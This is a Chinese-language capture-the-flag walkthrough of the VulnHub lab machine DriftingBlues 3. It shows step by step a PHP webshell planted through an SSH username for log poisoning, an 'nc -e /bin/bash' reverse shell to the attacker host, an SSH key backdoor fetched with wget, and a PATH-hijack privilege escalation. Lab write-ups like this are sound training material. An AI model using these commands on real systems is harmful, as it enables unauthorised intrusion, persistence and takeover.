文章目录
- DRIFTINGBLUES: 3实战演练
- 一、前期准备
- 1、相关信息
- 二、信息收集
- 1、端口扫描
- 2、访问网站
- 3、访问网页
- 4、翻译内容
- 5、访问网页
- 6、翻译内容
- 8、查看源码
- 9、解密
- 10、访问网页
- 11、写入shell并登录
- 12、连接shell
- 13、查找nc
- 14、反弹shell
- 三、后渗透
- 1、进入家目录查找文件
- 2、写入ssh密钥
- 3、SSH登录
- 4、查看第一个flag
- 5、查看权限和SUID文件
- 6、查看文件
- 7、写入shell并设置变量
- 8、查看第二个flag
DRIFTINGBLUES: 3实战演练
一、前期准备
1、相关信息
靶机网站:https://www.vulnhub.com/entry/driftingblues-3,656/
| 设备名称 | IP地址 |
|---|---|
| 攻击机:kali | 192.168.2.20 |
| 靶机:DRIFTINGBLUES: 3 | 192.168.2.25 |
二、信息收集
1、端口扫描
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.2.25
# 开放SSH:22端口、WEB:80端口
# SSH:22端口版本号为OpenSSH 7.9p1 Debian 10+deb10u2
# WEB:80端口中间件为Apache httpd 2.4.38
# robots目录下有一个/eventadmins
2、访问网站
http://192.168.2.25/
3、访问网页
http://192.168.2.25/eventadmins/
4、翻译内容
# 原文
man there's a problem with ssh
john said "it's poisonous!!! stay away!!!"
idk if he's mentally challenged
please find and fix it
also check /littlequeenofspades.html
your buddy, buddyG
# 译文
伙计ssh有问题
约翰说:“它有毒!!!离我远点!!!”
idk如果他有精神障碍
请找到并修复它
另请检查/lightqueenofspades.html
你的好友
# 发现一个路径/lightqueenofspades.html
5、访问网页
http://192.168.2.25/littlequeenofspades.html
6、翻译内容
# 原文
Now, she is a little queen of spades, and the men will not let her be
Mmmm, she is the little queen of spades, and the men will not let her be
Everytime she makes a spread, hoo fair brown, cold chill just runs all over me
I'm gon' get me a gamblin' woman, if the last thing that I do
Eee, gon' get me a gamblin' woman, if it's the last thing that I do
Well, a man don't need a woman, ooh fair brown, that he got to give all his money to
Everybody say she got a mojo, now she's been usin' that stuff
Mmmm, mmmm, 'verybody says she got a mojo, 'cause she been usin' that stuff
But she got a way trimmin' down, hoo fair brown, and I mean it's most too tough
Now, little girl, since I am the king, baby, and you is a queen
Ooo eee, since I am the king baby, and you is a queen
Le's us put our heads together, hoo fair brown, then we can make our money green
# 译文
现在,她成了黑桃皇后,男人们不会让她成为黑桃皇后的
嗯,她是黑桃皇后,男人们不会让她成为黑桃皇后的
每次她做一次涂抹,我全身都是苍白的棕色,冰冷的寒意
如果我做的最后一件事就是给我找个女人
Eee,如果这是我做的最后一件事,你会给我找个赌博的女人
好吧,一个男人不需要一个女人,哦,漂亮的棕色,他可以把所有的钱都给她
每个人都说她有魔力,现在她一直在用那些东西
嗯,嗯,每个人都说她有魔力,因为她一直在做那些事
但她有一条路要走,胡,浅棕色,我的意思是,这太难了
现在,小女孩,既然我是国王,宝贝,而你是王后
哦,因为我是国王,而你是王后
让我们集思广益,哇,棕色的,然后我们可以把钱变成绿色的
8、查看源码
view-source:http://192.168.2.25/littlequeenofspades.html
# 发现一串密文:aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==
9、解密
https://base64.us/
# intruder? /adminsfixit.php
10、访问网页
http://192.168.2.25/adminsfixit.php
11、写入shell并登录
┌──(kali㉿kali)-[~]
└─$ ssh '<?php system($_GET['cmd']);?>'@192.168.2.25
12、连接shell
view-source:http://192.168.2.25/adminsfixit.php?cmd=ls%20-la
13、查找nc
view-source:http://192.168.2.25/adminsfixit.php?cmd=which%20nc
14、反弹shell
view-source:http://192.168.2.25/adminsfixit.php?cmd=nc -e /bin/bash 192.168.2.20 9000
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 9000
三、后渗透
1、进入家目录查找文件
www-data@driftingblues:/var/www$ cd /home
www-data@driftingblues:/home$ ls -alh
www-data@driftingblues:/home$ cd robertj
www-data@driftingblues:/home/robertj$ ls -alh
2、写入ssh密钥
┌──(kali㉿kali)-[~]
└─$ ssh-keygen -f sain
┌──(kali㉿kali)-[~]
└─$ cp sain.pub ./authorized_keys
┌──(kali㉿kali)-[~]
└─$ python3 -m http.server
www-data@driftingblues:/home/robertj$ cd .ssh
www-data@driftingblues:/home/robertj/.ssh$ wget 192.168.2.20:8000/authorized_keys
3、SSH登录
┌──(kali㉿kali)-[~]
└─$ ssh robertj@192.168.2.25 -i sain
4、查看第一个flag
robertj@driftingblues:~$ ls -alh
robertj@driftingblues:~$ cat user.txt
5、查看权限和SUID文件
robertj@driftingblues:~$ find / -user root -perm /4000 2>/dev/null
6、查看文件
robertj@driftingblues:~$ /usr/bin/getinfo
7、写入shell并设置变量
robertj@driftingblues:~$ cd /tmp/
robertj@driftingblues:/tmp$ echo '/bin/bash -i' > ip
robertj@driftingblues:/tmp$ chmod +x ip
robertj@driftingblues:/tmp$ cd ~
robertj@driftingblues:~$ export PATH=/tmp/:$PATH
robertj@driftingblues:~$ /usr/bin/getinfo
8、查看第二个flag
root@driftingblues:~# cd /root
root@driftingblues:/root# ls -alh
root@driftingblues:/root# cat root.txt
